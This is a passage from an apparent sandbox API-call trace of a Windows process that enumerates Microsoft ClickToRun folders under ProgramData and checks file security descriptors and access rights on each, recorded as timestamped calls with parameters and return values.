RequestedInformation=0x7, pSecurityDescriptor=0x572db8, nLength=0x90, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x572db8, lpnLengthNeeded=0x281afc8) returned 1 [0105.938] GetLastError () returned 0x7a [0105.938] GetCurrentThread () returned 0xfffffffe [0105.938] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0105.938] GetCurrentProcess () returned 0xffffffff [0105.938] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0105.938] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x344) returned 1 [0105.938] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0105.938] AccessCheck (in: pSecurityDescriptor=0x572db8, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0105.938] CloseHandle (hObject=0x344) returned 1 [0105.938] CloseHandle (hObject=0x32c) returned 1 [0105.938] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.938] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.938] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.938] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.938] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0105.938] FindClose (in: hFindFile=0x5fc398 | out: hFindFile=0x5fc398) returned 1 [0105.939] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0105.939] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\23A8C7B1-0195-4D07-B6CF-93A6BF126B2A\\x-none.16\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc398 [0105.943] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\23A8C7B1-0195-4D07-B6CF-93A6BF126B2A\\x-none.16", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0105.943] GetLastError () returned 0x7a [0105.943] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\23A8C7B1-0195-4D07-B6CF-93A6BF126B2A\\x-none.16", RequestedInformation=0x7, pSecurityDescriptor=0x572db8, nLength=0x90, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x572db8, lpnLengthNeeded=0x281afc8) returned 1 [0105.943] GetLastError () returned 0x7a [0105.943] GetCurrentThread () returned 0xfffffffe [0105.943] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0105.943] GetCurrentProcess () returned 0xffffffff [0105.944] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0105.944] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x344) returned 1 [0105.944] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0105.944] AccessCheck (in: pSecurityDescriptor=0x572db8, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0105.944] CloseHandle (hObject=0x344) returned 1 [0105.944] CloseHandle (hObject=0x32c) returned 1 [0105.944] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.944] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.944] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.944] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.944] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0105.944] FindClose (in: hFindFile=0x5fc398 | out: hFindFile=0x5fc398) returned 1 [0105.944] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0105.944] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0105.944] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0105.944] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\ADF651D2-0955-41AF-92E7-FAF4B0CAEB96\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0105.945] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\ADF651D2-0955-41AF-92E7-FAF4B0CAEB96", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0105.945] GetLastError () returned 0x7a [0105.945] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\ADF651D2-0955-41AF-92E7-FAF4B0CAEB96", RequestedInformation=0x7, pSecurityDescriptor=0x5716a8, nLength=0x90, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x5716a8, lpnLengthNeeded=0x281b560) returned 1 [0105.945] GetLastError () returned 0x7a [0105.945] GetCurrentThread () returned 0xfffffffe [0105.945] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0105.945] GetCurrentProcess () returned 0xffffffff [0105.945] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x33c) returned 1 [0105.945] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0105.945] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0105.945] AccessCheck (in: pSecurityDescriptor=0x5716a8, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0105.945] CloseHandle (hObject=0x32c) returned 1 [0105.945] CloseHandle (hObject=0x33c) returned 1 [0105.945] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0105.945] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0105.945] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\ADF651D2-0955-41AF-92E7-FAF4B0CAEB96\\en-us.16\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc398 [0105.962] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\ADF651D2-0955-41AF-92E7-FAF4B0CAEB96\\en-us.16", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0105.962] GetLastError () returned 0x7a [0105.962] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\ADF651D2-0955-41AF-92E7-FAF4B0CAEB96\\en-us.16", RequestedInformation=0x7, pSecurityDescriptor=0x572db8, nLength=0x90, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x572db8, lpnLengthNeeded=0x281afc8) returned 1 [0105.962] GetLastError () returned 0x7a [0105.962] GetCurrentThread () returned 0xfffffffe [0105.962] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0105.962] GetCurrentProcess () returned 0xffffffff [0105.962] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0105.962] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x344) returned 1 [0105.962] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0105.962] AccessCheck (in: pSecurityDescriptor=0x572db8, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0105.962] CloseHandle (hObject=0x344) returned 1 [0105.962] CloseHandle (hObject=0x32c) returned 1 [0105.962] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.963] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.963] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.963] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.963] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0105.963] FindClose (in: hFindFile=0x5fc398 | out: hFindFile=0x5fc398) returned 1 [0105.963] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0105.963] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\ADF651D2-0955-41AF-92E7-FAF4B0CAEB96\\x-none.16\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc398 [0105.967] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\ADF651D2-0955-41AF-92E7-FAF4B0CAEB96\\x-none.16", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0105.968] GetLastError () returned 0x7a [0105.968] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\ADF651D2-0955-41AF-92E7-FAF4B0CAEB96\\x-none.16", RequestedInformation=0x7, pSecurityDescriptor=0x572db8, nLength=0x90, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x572db8, lpnLengthNeeded=0x281afc8) returned 1 [0105.968] GetLastError () returned 0x7a [0105.968] GetCurrentThread () returned 0xfffffffe [0105.968] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0105.968] GetCurrentProcess () returned 0xffffffff [0105.968] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0105.968] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x344) returned 1 [0105.968] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0105.968] AccessCheck (in: pSecurityDescriptor=0x572db8, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0105.968] CloseHandle (hObject=0x344) returned 1 [0105.968] CloseHandle (hObject=0x32c) returned 1 [0105.968] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.968] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.968] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.969] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.969] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0105.969] FindClose (in: hFindFile=0x5fc398 | out: hFindFile=0x5fc398) returned 1 [0105.969] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0105.969] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0105.969] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0105.969] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\B67F2A9E-0258-4BAE-8ED4-AFE18C0C9A23\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0105.970] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\B67F2A9E-0258-4BAE-8ED4-AFE18C0C9A23", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0105.971] GetLastError () returned 0x7a [0105.971] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\B67F2A9E-0258-4BAE-8ED4-AFE18C0C9A23", RequestedInformation=0x7, pSecurityDescriptor=0x5716a8, nLength=0x90, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x5716a8, lpnLengthNeeded=0x281b560) returned 1 [0105.971] GetLastError () returned 0x7a [0105.971] GetCurrentThread () returned 0xfffffffe [0105.971] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0105.971] GetCurrentProcess () returned 0xffffffff [0105.971] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x33c) returned 1 [0105.971] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0105.971] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0105.971] AccessCheck (in: pSecurityDescriptor=0x5716a8, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0105.971] CloseHandle (hObject=0x32c) returned 1 [0105.971] CloseHandle (hObject=0x33c) returned 1 [0105.971] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0105.971] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0105.971] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\B67F2A9E-0258-4BAE-8ED4-AFE18C0C9A23\\en-us.16\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc398 [0105.995] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\B67F2A9E-0258-4BAE-8ED4-AFE18C0C9A23\\en-us.16", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0105.996] GetLastError () returned 0x7a [0105.996] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\B67F2A9E-0258-4BAE-8ED4-AFE18C0C9A23\\en-us.16", RequestedInformation=0x7, pSecurityDescriptor=0x572db8, nLength=0x90, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x572db8, lpnLengthNeeded=0x281afc8) returned 1 [0105.996] GetLastError () returned 0x7a [0105.996] GetCurrentThread () returned 0xfffffffe [0105.996] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0105.996] GetCurrentProcess () returned 0xffffffff [0105.996] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0105.996] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x344) returned 1 [0105.996] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0105.996] AccessCheck (in: pSecurityDescriptor=0x572db8, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0105.996] CloseHandle (hObject=0x344) returned 1 [0105.996] CloseHandle (hObject=0x32c) returned 1 [0105.996] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.996] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.996] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.996] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0105.996] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0105.996] FindClose (in: hFindFile=0x5fc398 | out: hFindFile=0x5fc398) returned 1 [0105.997] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0105.997] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\B67F2A9E-0258-4BAE-8ED4-AFE18C0C9A23\\x-none.16\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc398 [0106.005] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\B67F2A9E-0258-4BAE-8ED4-AFE18C0C9A23\\x-none.16", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.005] GetLastError () returned 0x7a [0106.005] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\B67F2A9E-0258-4BAE-8ED4-AFE18C0C9A23\\x-none.16", RequestedInformation=0x7, pSecurityDescriptor=0x572db8, nLength=0x90, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x572db8, lpnLengthNeeded=0x281afc8) returned 1 [0106.005] GetLastError () returned 0x7a [0106.006] GetCurrentThread () returned 0xfffffffe [0106.006] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.006] GetCurrentProcess () returned 0xffffffff [0106.006] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.006] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x344) returned 1 [0106.006] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.006] AccessCheck (in: pSecurityDescriptor=0x572db8, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.006] CloseHandle (hObject=0x344) returned 1 [0106.006] CloseHandle (hObject=0x32c) returned 1 [0106.006] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.006] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.006] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.006] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.006] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.006] FindClose (in: hFindFile=0x5fc398 | out: hFindFile=0x5fc398) returned 1 [0106.006] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.006] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.006] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.006] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\D3BE4D83-2D47-4B3D-97F1-5483AB9ADC5C\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.007] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\D3BE4D83-2D47-4B3D-97F1-5483AB9ADC5C", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.007] GetLastError () returned 0x7a [0106.007] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\D3BE4D83-2D47-4B3D-97F1-5483AB9ADC5C", RequestedInformation=0x7, pSecurityDescriptor=0x5716a8, nLength=0x90, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x5716a8, lpnLengthNeeded=0x281b560) returned 1 [0106.007] GetLastError () returned 0x7a [0106.007] GetCurrentThread () returned 0xfffffffe [0106.007] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.007] GetCurrentProcess () returned 0xffffffff [0106.007] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x33c) returned 1 [0106.007] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.007] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.008] AccessCheck (in: pSecurityDescriptor=0x5716a8, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.008] CloseHandle (hObject=0x32c) returned 1 [0106.008] CloseHandle (hObject=0x33c) returned 1 [0106.008] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.008] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.008] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\D3BE4D83-2D47-4B3D-97F1-5483AB9ADC5C\\en-us.16\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc398 [0106.009] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\D3BE4D83-2D47-4B3D-97F1-5483AB9ADC5C\\en-us.16", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.009] GetLastError () returned 0x7a [0106.009] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\D3BE4D83-2D47-4B3D-97F1-5483AB9ADC5C\\en-us.16", RequestedInformation=0x7, pSecurityDescriptor=0x572db8, nLength=0x90, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x572db8, lpnLengthNeeded=0x281afc8) returned 1 [0106.009] GetLastError () returned 0x7a [0106.009] GetCurrentThread () returned 0xfffffffe [0106.009] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.009] GetCurrentProcess () returned 0xffffffff [0106.009] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.009] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x344) returned 1 [0106.009] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.009] AccessCheck (in: pSecurityDescriptor=0x572db8, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.009] CloseHandle (hObject=0x344) returned 1 [0106.009] CloseHandle (hObject=0x32c) returned 1 [0106.009] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.009] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.009] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.009] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.009] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.009] FindClose (in: hFindFile=0x5fc398 | out: hFindFile=0x5fc398) returned 1 [0106.010] FindNextFileW (in: 